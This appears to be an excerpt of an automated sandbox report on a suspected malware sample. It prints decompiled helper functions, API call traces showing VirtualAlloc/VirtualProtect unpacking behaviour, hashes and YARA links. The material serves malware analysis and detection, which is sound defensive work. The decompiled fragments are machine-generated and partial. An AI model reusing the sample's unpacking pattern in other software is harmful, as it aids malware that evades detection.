Instruction Fuzzy Hash: 10F03474600A40DBD720EB78DC58B667BE4AB18340B888A60F502CB261DAA4E800CA2A

Uniqueness

Uniqueness Score: -1.00%

Function 00BB98F9, Relevance: 6.0, APIs: 4, Instructions: 28
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00BB98F9() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0xbbd32c; // 0x36195b0
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0xbbd32c; // 0x36195b0
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0xbbd32c; // 0x36195b0
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0xbbe836) {
					HeapFree( *0xbbd238, 0, _t10);
					_t7 =  *0xbbd32c; // 0x36195b0
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}

0x00bb98f9
0x00bb9902
0x00bb9912
0x00bb9912
0x00bb9917
0x00bb991c
0x00000000
0x00000000
0x00bb990c
0x00bb990c
0x00bb991e
0x00bb9923
0x00bb9927
0x00bb993a
0x00bb9940
0x00bb9940
0x00bb9949
0x00bb994b
0x00bb994f
0x00bb9955

APIs

RtlEnterCriticalSection.NTDLL(03619570), ref: 00BB9902
Sleep.KERNEL32(0000000A,?,00BB1971), ref: 00BB990C
HeapFree.KERNEL32(00000000,?,?,00BB1971), ref: 00BB993A
RtlLeaveCriticalSection.NTDLL(03619570), ref: 00BB994F

Memory Dump Source

Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp Download File

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: b27bbbdb920713b62521b142ff5f2a11c619445aa11e43335b2e7451f6c2b2d8
Instruction ID: dc332444d56dbaacd53d47ee3ba75c6f745e080e90aba36676ce0aa3e5599771
Opcode Fuzzy Hash: b27bbbdb920713b62521b142ff5f2a11c619445aa11e43335b2e7451f6c2b2d8
Instruction Fuzzy Hash: 7DF0D478600500DFE768DF64DD99B657BE5EB09300B488259FA46CB371DBB4EC00DA2A

Uniqueness

Uniqueness Score: -1.00%

Function 00BB6108, Relevance: 5.1, APIs: 4, Instructions: 70
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00BB6108(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E00BB98E4(_t2);
				if(_t34 != 0) {
					_t30 = E00BB98E4(_t28);
					if(_t30 == 0) {
						E00BB5DE8(_t34);
					} else {
						_t39 = _a4;
						_t22 = E00BBA8D2(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E00BBA8D2(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}

0x00bb6108
0x00bb6112
0x00bb6114
0x00bb611a
0x00bb611a
0x00bb6123
0x00bb6127
0x00bb6133
0x00bb6137
0x00bb61ab
0x00bb6139
0x00bb6139
0x00bb613d
0x00bb6142
0x00bb6147
0x00bb6161
0x00bb6150
0x00bb6150
0x00bb6154
0x00bb6157
0x00bb615c
0x00bb615c
0x00bb6166
0x00bb618e
0x00bb6194
0x00bb6197
0x00bb6168
0x00bb616a
0x00bb6172
0x00bb617d
0x00bb6182
0x00bb6182
0x00bb619e
0x00bb61a5
0x00bb61a6
0x00bb61a6
0x00bb6137
0x00bb61b6

APIs

lstrlen.KERNEL32(00000000,00000008,?,74B04D40,?,?,00BBA2F8,?,?,?,?,00000102,00BB15D7,?,?,00000000), ref: 00BB6114

Part of subcall function 00BB98E4: RtlAllocateHeap.NTDLL(00000000,00000000,00BB6788), ref: 00BB98F0

Part of subcall function 00BBA8D2: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,00BB6142,00000000,00000001,00000001,?,?,00BBA2F8,?,?,?,?,00000102), ref: 00BBA8E0
Part of subcall function 00BBA8D2: StrChrA.SHLWAPI(?,0000003F,?,?,00BBA2F8,?,?,?,?,00000102,00BB15D7,?,?,00000000,00000000), ref: 00BBA8EA

memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,00BBA2F8,?,?,?,?,00000102,00BB15D7,?), ref: 00BB6172
lstrcpy.KERNEL32(00000000,00000000), ref: 00BB6182
lstrcpy.KERNEL32(00000000,00000000), ref: 00BB618E

Memory Dump Source

Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrcpy$AllocateHeaplstrlenmemcpy
String ID:
API String ID: 3767559652-0
Opcode ID: b93e2db8c8a07d2917df226452a58376cc5a33419c41825bfb5f7e1219102dd6
Instruction ID: 06b08e0b860d0aa63de6e76dca7e7dc9b2a707476c74158b6799ae77bee65664
Opcode Fuzzy Hash: b93e2db8c8a07d2917df226452a58376cc5a33419c41825bfb5f7e1219102dd6
Instruction Fuzzy Hash: 6D218E72904255FBCB12AF78CC94AFA7FE8EF46780B148195F904AB212DAB5DD01D7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00BB5115, Relevance: 5.0, APIs: 4, Instructions: 39
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00BB5115(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E00BB98E4(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}

0x00bb512a
0x00bb512e
0x00bb5138
0x00bb513d
0x00bb5142
0x00bb5144
0x00bb514c
0x00bb5151
0x00bb515f
0x00bb5164
0x00bb516e

APIs

lstrlenW.KERNEL32(004F0053,?,74B05520,00000008,0361937C,?,00BB876F,004F0053,0361937C,?,?,?,?,?,?,00BB780E), ref: 00BB5125
lstrlenW.KERNEL32(00BB876F,?,00BB876F,004F0053,0361937C,?,?,?,?,?,?,00BB780E), ref: 00BB512C

Part of subcall function 00BB98E4: RtlAllocateHeap.NTDLL(00000000,00000000,00BB6788), ref: 00BB98F0

memcpy.NTDLL(00000000,004F0053,74B069A0,?,?,00BB876F,004F0053,0361937C,?,?,?,?,?,?,00BB780E), ref: 00BB514C
memcpy.NTDLL(74B069A0,00BB876F,00000002,00000000,004F0053,74B069A0,?,?,00BB876F,004F0053,0361937C), ref: 00BB515F

Memory Dump Source

Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrlenmemcpy$AllocateHeap
String ID:
API String ID: 2411391700-0
Opcode ID: ba5672e6867fd7a658489956026258228f5c22a5b9855b39fff41b4bb9b7d62b
Instruction ID: 56118cea49b5b0401db96eba82ae7f2bcce4c758cf1d0bd4165c5ab518d4641e
Opcode Fuzzy Hash: ba5672e6867fd7a658489956026258228f5c22a5b9855b39fff41b4bb9b7d62b
Instruction Fuzzy Hash: 2FF0EC76900119BB8F11EBA9CC45CDF7BACEF493547154066BA0897111E671EA14DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00BBA755, Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(03619908,00000000,00000000,7742C740,00BB6053,00000000), ref: 00BBA765
lstrlen.KERNEL32(?), ref: 00BBA76D

Part of subcall function 00BB98E4: RtlAllocateHeap.NTDLL(00000000,00000000,00BB6788), ref: 00BB98F0

lstrcpy.KERNEL32(00000000,03619908), ref: 00BBA781
lstrcat.KERNEL32(00000000,?), ref: 00BBA78C

Memory Dump Source

Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrlen$AllocateHeaplstrcatlstrcpy
String ID:
API String ID: 74227042-0
Opcode ID: 9f3045b25021535ed5d934b184cbc3a7948e46917c045e5e5e21cfc7f3b64282
Instruction ID: c12d630cd699c2cde98b05919cc9b2d1b08ab5b81e3f0766d98179bc92d7654a
Opcode Fuzzy Hash: 9f3045b25021535ed5d934b184cbc3a7948e46917c045e5e5e21cfc7f3b64282
Instruction Fuzzy Hash: 20E09233901620A78711BBE4AC48CABBFACFF897517044557F600D3120CBA48C01CBE1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 6024 Parent PID: 3880 rundll32.exeCOMMON

Executed Functions

Function 6E141302, Relevance: 13.8, APIs: 9, Instructions: 318memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000078E,00003000,00000040,0000078E,6E140D58), ref: 6E1413BF
VirtualAlloc.KERNEL32(00000000,0000003D,00003000,00000040,6E140DBB), ref: 6E1413F6
VirtualAlloc.KERNEL32(00000000,00012AF2,00003000,00000040), ref: 6E141456
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E14148C
VirtualProtect.KERNEL32(6E0C0000,00000000,00000004,6E1412E1), ref: 6E141591
VirtualProtect.KERNEL32(6E0C0000,00001000,00000004,6E1412E1), ref: 6E1415B8
VirtualProtect.KERNEL32(00000000,?,00000002,6E1412E1), ref: 6E141685
VirtualProtect.KERNEL32(00000000,?,00000002,6E1412E1,?), ref: 6E1416DB
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E1416F7

Memory Dump Source

Source File: 00000003.00000002.473116666.000000006E140000.00000040.00020000.sdmp, Offset: 6E140000, based on PE: false

Similarity

API ID: Virtual$Protect$Alloc$Free
String ID:
API String ID: 2574235972-0
Opcode ID: 0f1f7b1b122eb33c6e72d88d935c3aa26e3bd9edeaa12e4efc1022abb1e4d76f
Instruction ID: b136cb20ea30fcee9dfd9d58ef8b83c67fa73a1dcdf25729568b5ed2d3552465
Opcode Fuzzy Hash: 0f1f7b1b122eb33c6e72d88d935c3aa26e3bd9edeaa12e4efc1022abb1e4d76f
Instruction Fuzzy Hash: F5D16776208A08DFDB51CF5AC8C0B5277A6EF8C320B290595ED0A9F75AD770B850DBA4

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6E10A8B9, Relevance: 16.7, APIs: 11, Instructions: 162COMMON

Download Yara Rule

APIs

___crtGetLocaleInfoA.LIBCMT ref: 6E10A90B

Part of subcall function 6E11185F: _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 6E11186B
Part of subcall function 6E11185F: __crtGetLocaleInfoA_stat.LIBCMT ref: 6E111880

GetLastError.KERNEL32(?,?,?,00000000,00000000), ref: 6E10A91D
___crtGetLocaleInfoA.LIBCMT ref: 6E10A93D
___crtGetLocaleInfoA.LIBCMT ref: 6E10A97F
__calloc_crt.LIBCMT ref: 6E10A952

Part of subcall function 6E10B167: __calloc_impl.LIBCMT ref: 6E10B176

__calloc_crt.LIBCMT ref: 6E10A994
_free.LIBCMT ref: 6E10A9AC
_free.LIBCMT ref: 6E10A9EC
__calloc_crt.LIBCMT ref: 6E10AA16
_free.LIBCMT ref: 6E10AA3C
__invoke_watson.LIBCMT ref: 6E10AA8C

Memory Dump Source

Source File: 00000003.00000002.472709504.000000006E0D0000.00000020.00020000.sdmp, Offset: 6E0D0000, based on PE: false

Similarity

API ID: Locale$Info$___crt__calloc_crt_free$A_statErrorLastUpdateUpdate::___calloc_impl__crt__invoke_watson
String ID:
API String ID: 1731282729-0
Opcode ID: 8bd77330b38939fa1344d345629bce8ef4d73ab333d3193767b1eb409824a7d5
Instruction ID: 51cae7c0d1636e89e716d6ee9466b69b4b055271640f95c6bc85a92fa07bd417
Opcode Fuzzy Hash: 8bd77330b38939fa1344d345629bce8ef4d73ab333d3193767b1eb409824a7d5
Instruction Fuzzy Hash: 5851BF71A1421AAFEB60CFA58D41FDABBBDEF14314F6084A5F80992141EF318DD4AB60

Uniqueness

Uniqueness Score: -1.00%

Function 6E12770D, Relevance: 6.1, APIs: 4, Instructions: 56COMMON

Download Yara Rule

APIs

_wcscmp.LIBCMT ref: 6E127724
_wcscmp.LIBCMT ref: 6E127735
GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 6E127751
GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 6E12777B

Memory Dump Source

Source File: 00000003.00000002.472709504.000000006E0D0000.00000020.00020000.sdmp, Offset: 6E0D0000, based on PE: false

Similarity

API ID: InfoLocale_wcscmp
String ID:
API String ID: 1351282208-0
Opcode ID: c6341a5dbce270518687af483a9166dba13fd0f6f0700d7424f26c2d8e359106
Instruction ID: a5055a90d9e015d4042af51f1c186057ccdf1a39a61fc09a1ac187abf6a24dd8
Opcode Fuzzy Hash: c6341a5dbce270518687af483a9166dba13fd0f6f0700d7424f26c2d8e359106
Instruction Fuzzy Hash: 95019231204516BFDF409EA5ED88FC737ACAF05765B218036F909DA1C4EB61D5C1B780

Uniqueness

Uniqueness Score: -1.00%

Function 6E1092FA, Relevance: 19.8, APIs: 13, Instructions: 289timeCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 6E109335

Part of subcall function 6E10B752: __getptd_noexit.LIBCMT ref: 6E10B752

__gmtime64_s.LIBCMT ref: 6E1093CE
__gmtime64_s.LIBCMT ref: 6E109404
__gmtime64_s.LIBCMT ref: 6E109421
__allrem.LIBCMT ref: 6E109477
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6E109493
__allrem.LIBCMT ref: 6E1094AA
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6E1094C8
__allrem.LIBCMT ref: 6E1094DF
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6E1094FD
__invoke_watson.LIBCMT ref: 6E10956E
GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 6E10957D
__aulldiv.LIBCMT ref: 6E10959D

Memory Dump Source

Source File: 00000003.00000002.472709504.000000006E0D0000.00000020.00020000.sdmp, Offset: 6E0D0000, based on PE: false

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$Time$FileSystem__aulldiv__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 2599720210-0
Opcode ID: efc6ac646cefa49946561dc786cae5171483882cf691f7f8f7c5a827e1585cf6
Instruction ID: 760331536417768322402fe68380dcd31fc42ed4fe2e146fcec35f652f04cffe
Opcode Fuzzy Hash: efc6ac646cefa49946561dc786cae5171483882cf691f7f8f7c5a827e1585cf6
Instruction Fuzzy Hash: F291A9B1A00706ABD714DEF9CC71B9AB7ACAF85324F14856AE514DB6C0EF70D9809B90

Uniqueness

Uniqueness Score: -1.00%

Function 6E11DCDC, Relevance: 18.1, APIs: 12, Instructions: 84COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 6E11DCF3

Part of subcall function 6E10B167: __calloc_impl.LIBCMT ref: 6E10B176

__calloc_crt.LIBCMT ref: 6E11DD17
_free.LIBCMT ref: 6E11DD25
__calloc_crt.LIBCMT ref: 6E11DD33
_free.LIBCMT ref: 6E11DD43
_free.LIBCMT ref: 6E11DD49
__copytlocinfo_nolock.LIBCMT ref: 6E11DD58
__setmbcp_nolock.LIBCMT ref: 6E11DD79
_free.LIBCMT ref: 6E11DD87
___removelocaleref.LIBCMT ref: 6E11DD8E
___freetlocinfo.LIBCMT ref: 6E11DD95
_free.LIBCMT ref: 6E11DD9B

Memory Dump Source

Source File: 00000003.00000002.472709504.000000006E0D0000.00000020.00020000.sdmp, Offset: 6E0D0000, based on PE: false

Similarity

API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock
String ID:
API String ID: 1442030790-0
Opcode ID: 5a1fe66797d197cbaa05f0de264b7106cd2a7f640f3236d1567e11faeda7eb6e
Instruction ID: 2ff77344f764249749dfe2d4eb841ac38127afe28d307e67ac2d5beeb3f61c62
Opcode Fuzzy Hash: 5a1fe66797d197cbaa05f0de264b7106cd2a7f640f3236d1567e11faeda7eb6e
Instruction Fuzzy Hash: DF21D43510C601AEEB619FE5DC04ECA77ADEF817A9B214839E444550E4EF3198D0FF90

Uniqueness

Uniqueness Score: -1.00%

Function 6E10AD06, Relevance: 18.1, APIs: 12, Instructions: 84COMMON

Download Yara Rule

APIs

RtlDecodePointer.NTDLL ref: 6E10AD0E
_free.LIBCMT ref: 6E10AD27

Part of subcall function 6E10AB1D: HeapFree.KERNEL32(00000000,00000000,?,6E10DD47,00000000,00000001,00000000,?,?,?,6E10A62D,6E108593), ref: 6E10AB31
Part of subcall function 6E10AB1D: GetLastError.KERNEL32(00000000,?,6E10DD47,00000000,00000001,00000000,?,?,?,6E10A62D,6E108593), ref: 6E10AB43

_free.LIBCMT ref: 6E10AD3A
_free.LIBCMT ref: 6E10AD58
_free.LIBCMT ref: 6E10AD6A
_free.LIBCMT ref: 6E10AD7B
_free.LIBCMT ref: 6E10AD86
_free.LIBCMT ref: 6E10ADAA
RtlEncodePointer.NTDLL(6E24E390), ref: 6E10ADB1
_free.LIBCMT ref: 6E10ADC6
_free.LIBCMT ref: 6E10ADDC
_free.LIBCMT ref: 6E10AE04

Memory Dump Source

Source File: 00000003.00000002.472709504.000000006E0D0000.00000020.00020000.sdmp, Offset: 6E0D0000, based on PE: false

Similarity

API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
String ID:
API String ID: 3064303923-0
Opcode ID: cd0c1f7b04153db5c440f1187e2507296fcb654216a58764c56bec7bff027ee9
Instruction ID: 65f4b123d99220f5cdf7a931add5cd46c4695cdff37ae057fd17f1c8ff8a8d64
Opcode Fuzzy Hash: cd0c1f7b04153db5c440f1187e2507296fcb654216a58764c56bec7bff027ee9
Instruction Fuzzy Hash: B021C972900A11DBEF11EF94D944D5A3FAABB56765360093DE8249B200CF3068C0FFA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E11DDB3, Relevance: 16.6, APIs: 11, Instructions: 131COMMON

Download Yara Rule

APIs

__invoke_watson.LIBCMT ref: 6E11DDEC
__calloc_crt.LIBCMT ref: 6E11DE3D
__lock.LIBCMT ref: 6E11DE53
__copytlocinfo_nolock.LIBCMT ref: 6E11DE64
_wcscmp.LIBCMT ref: 6E11DE9E
__lock.LIBCMT ref: 6E11DEB5
__updatetlocinfoEx_nolock.LIBCMT ref: 6E11DEC7
___removelocaleref.LIBCMT ref: 6E11DECD
__updatetlocinfoEx_nolock.LIBCMT ref: 6E11DEEC

Memory Dump Source

Source File: 00000003.00000002.472709504.000000006E0D0000.00000020.00020000.sdmp, Offset: 6E0D0000, based on PE: false

Similarity

API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__invoke_watson_wcscmp
String ID:
API String ID: 3432600739-0
Opcode ID: 243ff4ac02331beb545ac44df9e998519be2be7f2040bb608ad5b17419541fc0
Instruction ID: 038bdeb24cff40f47c13a7f57fce405bfa607c141cd564eca6d3cf3e6215b4f0
Opcode Fuzzy Hash: 243ff4ac02331beb545ac44df9e998519be2be7f2040bb608ad5b17419541fc0
Instruction Fuzzy Hash: 9641A23290C30AAFDB00DFE4D844BCE77B8AB5531AF208939E91896184DB7596C6FF51

Uniqueness

Uniqueness Score: -1.00%

Function 6E1085D7, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 6E1085EA

Part of subcall function 6E10A60F: std::exception::_Copy_str.LIBCMT ref: 6E10A628

__CxxThrowException@8.LIBCMT ref: 6E1085FF

Part of subcall function 6E1095D4: RaiseException.KERNEL32(?,?,6E13D110,6E13B25C,?,?,?,?,?,6E108556,6E13D110,6E13B25C,?,00000001), ref: 6E109629

std::exception::exception.LIBCMT ref: 6E108618
__CxxThrowException@8.LIBCMT ref: 6E10862D
std::regex_error::regex_error.LIBCPMT ref: 6E10863F

Part of subcall function 6E1083AB: std::exception::exception.LIBCMT ref: 6E1083C5

__CxxThrowException@8.LIBCMT ref: 6E10864D
std::exception::exception.LIBCMT ref: 6E108666
__CxxThrowException@8.LIBCMT ref: 6E10867B

Strings

bad function call, xrefs: 6E108681

Memory Dump Source

Source File: 00000003.00000002.472709504.000000006E0D0000.00000020.00020000.sdmp, Offset: 6E0D0000, based on PE: false

Similarity

API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaisestd::exception::_std::regex_error::regex_error
String ID: bad function call
API String ID: 2464034642-3612616537
Opcode ID: d7c83af803136d1c014a78ff62431d9fc7f3720dba89e5621f5b37e47a4090c1
Instruction ID: 6b50be22f34c0701859108c1f9b7dea421f1d16f557bb625ace096dae80f13e8
Opcode Fuzzy Hash: d7c83af803136d1c014a78ff62431d9fc7f3720dba89e5621f5b37e47a4090c1
Instruction Fuzzy Hash: 3411EF78C0421CBBCB00EFE5C459CCEBB7CEB44244B508866ED25A7244EB34E6899B95

Uniqueness

Uniqueness Score: -1.00%

Function 6E10DE09, Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON

Download Yara Rule

APIs

__init_pointers.LIBCMT ref: 6E10DE09

Part of subcall function 6E10AF51: RtlEncodePointer.NTDLL(00000000), ref: 6E10AF54
Part of subcall function 6E10AF51: __initp_misc_winsig.LIBCMT ref: 6E10AF6F
Part of subcall function 6E10AF51: GetModuleHandleW.KERNEL32(6E135EE8), ref: 6E110D88

__mtinitlocks.LIBCMT ref: 6E10DE0E
__mtterm.LIBCMT ref: 6E10DE17

Part of subcall function 6E10DE7F: RtlDeleteCriticalSection.NTDLL ref: 6E111CA5
Part of subcall function 6E10DE7F: _free.LIBCMT ref: 6E111CAC
Part of subcall function 6E10DE7F: RtlDeleteCriticalSection.NTDLL(6E13D520), ref: 6E111CCE

__calloc_crt.LIBCMT ref: 6E10DE3C
__initptd.LIBCMT ref: 6E10DE5E
GetCurrentThreadId.KERNEL32 ref: 6E10DE65

Memory Dump Source

Source File: 00000003.00000002.472709504.000000006E0D0000.00000020.00020000.sdmp, Offset: 6E0D0000, based on PE: false

Similarity

API ID: CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
String ID:
API String ID: 1551663144-0
Opcode ID: 43a3f18aad6e9bce0cb3e3c546180be32d21269a9fb6bb02b4432a717a893ea4
Instruction ID: 993a8c25632e8661ad531390bd2b64d2173732f0b2b40d816222f2ecd0542779
Opcode Fuzzy Hash: 43a3f18aad6e9bce0cb3e3c546180be32d21269a9fb6bb02b4432a717a893ea4
Instruction Fuzzy Hash: 3FF0F632509A125FE6B4BAF03C007CB3698AF2267CB214E29E474C50D4FF2084C07955

Uniqueness

Uniqueness Score: -1.00%

Function 6E1135FB, Relevance: 9.1, APIs: 6, Instructions: 112COMMON

Download Yara Rule

APIs

__getenv_helper_nolock.LIBCMT ref: 6E113636
__invoke_watson.LIBCMT ref: 6E113690
_strlen.LIBCMT ref: 6E113644

Part of subcall function 6E10B752: __getptd_noexit.LIBCMT ref: 6E10B752

_strnlen.LIBCMT ref: 6E1136CF
__lock.LIBCMT ref: 6E1136E0
__getenv_helper_nolock.LIBCMT ref: 6E1136EB

Memory Dump Source

Source File: 00000003.00000002.472709504.000000006E0D0000.00000020.00020000.sdmp, Offset: 6E0D0000, based on PE: false

Similarity

API ID: __getenv_helper_nolock$__getptd_noexit__invoke_watson__lock_strlen_strnlen
String ID:
API String ID: 3534693527-0
Opcode ID: fef238e8e29acb2b7113aadd19b2aad9475b8885c9fbbf16980cc4140cc2d2bb
Instruction ID: 7847825165dd8bc58f23a06ed04b14069dcfbc85c04d1073d4c4b73bd0191e70
Opcode Fuzzy Hash: fef238e8e29acb2b7113aadd19b2aad9475b8885c9fbbf16980cc4140cc2d2bb
Instruction Fuzzy Hash: 74313C71A0C615AAD7119AE48C08BDE77689F15BA4F234835D824DF38CDF74CAC2A7A0

Uniqueness

Uniqueness Score: -1.00%

Function 6E11282C, Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 6E112838

Part of subcall function 6E108902: __FF_MSGBANNER.LIBCMT ref: 6E108919
Part of subcall function 6E108902: __NMSG_WRITE.LIBCMT ref: 6E108920
Part of subcall function 6E108902: RtlAllocateHeap.NTDLL(6E24E9EC,00000000,00000001), ref: 6E108945

_free.LIBCMT ref: 6E11284B

Memory Dump Source

Source File: 00000003.00000002.472709504.000000006E0D0000.00000020.00020000.sdmp, Offset: 6E0D0000, based on PE: false

Similarity

API ID: AllocateHeap_free_malloc
String ID:
API String ID: 1020059152-0
Opcode ID: 59f0e5d09bbcc3b6090abcb73ed866c6008187bf921f02b613d8f18192ccb9ea
Instruction ID: 957b0b36752524cb789c3c819980b3da50b24a406ccddb4a92aae05da15f8f19
Opcode Fuzzy Hash: 59f0e5d09bbcc3b6090abcb73ed866c6008187bf921f02b613d8f18192ccb9ea
Instruction Fuzzy Hash: 1A11A731508615EFDB65AFF5A844ECA37ECAF16364B204939E9589B184DF3488C1F750

Uniqueness

Uniqueness Score: -1.00%

Function 6E1283C5, Relevance: 6.1, APIs: 4, Instructions: 97COMMON

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 6E1283FB
__isleadbyte_l.LIBCMT ref: 6E128429
MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,00000000,00000000), ref: 6E128457
MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,00000000,00000000), ref: 6E12848D

Memory Dump Source

Source File: 00000003.00000002.472709504.000000006E0D0000.00000020.00020000.sdmp, Offset: 6E0D0000, based on PE: false

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: cff1babed407d744bd919cec95c08b616448c6afe7b5ac2bd792ebe622bb6397
Instruction ID: eee057fe9e5f19638c067f1808be23119f7c1ccb031f90b971be4775a8021d19
Opcode Fuzzy Hash: cff1babed407d744bd919cec95c08b616448c6afe7b5ac2bd792ebe622bb6397
Instruction Fuzzy Hash: 30316131A04296EFEB518EE5CC44BAA7BB9FF41314F218579E9648B190D730D8D1EB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E10F67D, Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 6E10F6A1

Part of subcall function 6E10FDC1: __fltout2.LIBCMT ref: 6E10FDEA

__cftog_l.LIBCMT ref: 6E10F6C7
__cftoe_l.LIBCMT ref: 6E10F6F9

Memory Dump Source

Source File: 00000003.00000002.472709504.000000006E0D0000.00000020.00020000.sdmp, Offset: 6E0D0000, based on PE: false

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
Instruction ID: efc60baeabaff140f2c2f86ee6539793c89da04fc8b4b1a2a4113c13af2a4bd4
Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
Instruction Fuzzy Hash: 1D01243244014EBB8F429EC4CC129EA3F66BB2D254B658815FA3858130DB36C9B1BB89

Uniqueness

